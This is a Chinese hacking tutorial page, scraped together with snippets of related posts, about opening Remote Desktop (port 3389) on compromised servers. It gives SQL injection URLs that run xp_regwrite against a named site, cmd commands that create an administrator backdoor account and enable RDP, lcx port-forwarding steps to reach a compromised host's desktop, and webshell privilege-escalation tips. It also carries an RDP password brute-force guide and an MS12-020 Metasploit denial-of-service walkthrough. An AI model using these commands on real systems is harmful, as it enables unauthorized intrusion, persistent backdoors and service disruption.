MSSQL开启3389

其实就是利用MSSQL的存储过程xp_regwrite 。大家在渗透MSSQL服务器的时候,苦于无法上传开3389工具和3389工具不免杀时,可以使用此招轻松开启3389。

3389登陆关键注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections 
其 中键值DenyTSConnections 直接控制着3389的开启和关闭。当该键值为0表示3389开启,1则表示关闭。而MSSQL的xp_regwrite的存储过程可以对注册进行修改。我 们使用这点就可以简单的修改DenyTSConnections键值,从而控制3389的关闭和开启。

开启3389的SQL语句:
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite‘HKEY_LOCAL_MACHINE‘,‘SYSTEM\CurrentControlSet\Control\Terminal Server‘,‘fDenyTSConnections‘,‘REG_DWORD‘,0;

关闭3389的SQL语句:
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite‘HKEY_LOCAL_MACHINE‘,‘SYSTEM\CurrentControlSet\Control\Terminal Server‘,‘fDenyTSConnections‘,‘REG_DWORD‘,1;

时间: 2024-11-05 17:19:39

MSSQL开启3389的相关文章

cmd创建用户开启3389命令

1.创建用户chen Net user chen 1234566 /add 2.将用户chen添加到管理员组 net localgroup Administrators chen /add 3.开启3389端口 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 原文地址:https://www.cnblogs.

黑客入侵后端口转发利器lcx,开启3389旅途

lcx可以将内网端口映射到本机,缺点是需要本地电脑拥有外网IP,不然在某些情况lcx就无用武之地了.与之相比,reDuh更加优秀,后续会讲到. lcx只有3中命令,常用的有2种. 首先在肉鸡上lcx.exe -slave 本机IP PORT1 肉鸡IP 3389 然后本地执行  lcx.exe -listen PORT1 PORT2: 登陆远程桌面 输入127.0.0.1:PORT2,即可登陆到肉鸡的桌面. 在肉鸡3389开启的情况下,webshell提权中也常用lcx进行内网转发.

cmd开启3389,无需重启!

echo DO ALL IN CMD! reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"

[集合]解决system权限3389无法添加的用户情况

Webshell有了SYSTEM权限,却无法成功添加administrators用户,因此导致无法成功连接3389.总结原因有以下几点:I.杀软篇1,360杀毒软件2,麦咖啡杀毒软件3,卡巴斯基杀毒软件4,其他杀毒软件或防护软件II.策略篇1,3389端口变更2,莫名其妙无法添加账户3,管理员限制篇4,系统已达最大连接数处理 ———————–I. 杀软篇—————————–1,360杀毒软件经常会在国内的一些服务器上遇到360杀毒和防护软件,如果使用webshell进行添加administrat

Windows服务器SYSTEM权限Webshell无法添加3389账户情况突破总结

转自:http://bbs.blackbap.org/thread-2331-1-1.html 近好多Silic的朋友在Windows下SYSTEM权限的php webshell下添加账户,但是却无法成功.SYSTEM的权限,权限是够了,却无法成功,原因是什么呢?原因有很多种,于是我总结了一下成因,并在下面文章进行了一一分析,然后附上了一点个人的突破绕过方法.提权不可能百分百成功,我只是总结了一些常见的情况,其他的我会慢慢补充作者:YoCo Smart来自:Silic Group Hacker

3389爆破服务器技术全过程与原理

其实爆破服务器很简单的,也是必学的. 3389是一个远程桌面的端口,很多人为了更方便管理服务器,更新服务器上的资源等,经常会开启3389端口,用nastat-an命令可以查看该端口的开启.对于一个账户如果账号密码过于弱很容易被爆破到,一般默认账号为Administrator或admin,而对于过于简单的密码,在3389密码字典中均可找到,下面来讲解爆破3389服务器,获得一台服务器的全过程. 工具:DUbrute爆破工具(或者用frdpb)SYN扫描工具IP Search 首先用IPseache

CVE-2012-0002(MS12-020)3389远程溢出漏洞

1:攻击机:Kali和windows皆可 2:目标机:windows XP系统(开启3389) Kali测试: search m12-020 搜索ms12-020 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 选择模块 show options 查看所需参数 set RHOST 192.168.0.110 设置目标IP地址 exploit 执行 目标机重启了... Windows测试: 微软修复建议:https://technet.mi

DUbrute 3389爆破入侵教程

DUBrute是一款强大的远程桌面(3389)密码破解软件,你可以用本附件的扫描功能来自动扫描活跃IP地址,扫描完成后设置好用户名与需要猜解的密码就可以开始全自动工作了.只要你密码设置的好相信会有很大的收获哦. 3389是一个远程桌面的端口,很多人为了更方便管理服务器,更新服务器上的资源等,经常会开启3389端口,用nastat -an命令可以查看该端口的开启.对于一个账户如果账号密码过于弱很容易被爆破到,一般默认账号为Administrator,极少会是admin,而对于过于简单的密码,在33

提权笔记本

/* 转载请注明出处 ID:珍惜少年时 */ 21------------FTP //找到其FTP目录,破解其密码搜索,提之 22------------linux终端 23------------telnet //可以爆破,然后dos连接之,连接后添加用户开启终端端口,然后宣告拿下! 1433----------mssql提权 //需要找到sa密码,一般存在于web.config文件中,uid pwd sa为关键字,找到该文件后Ctrl+f搜索关键字提之 3306----------mysql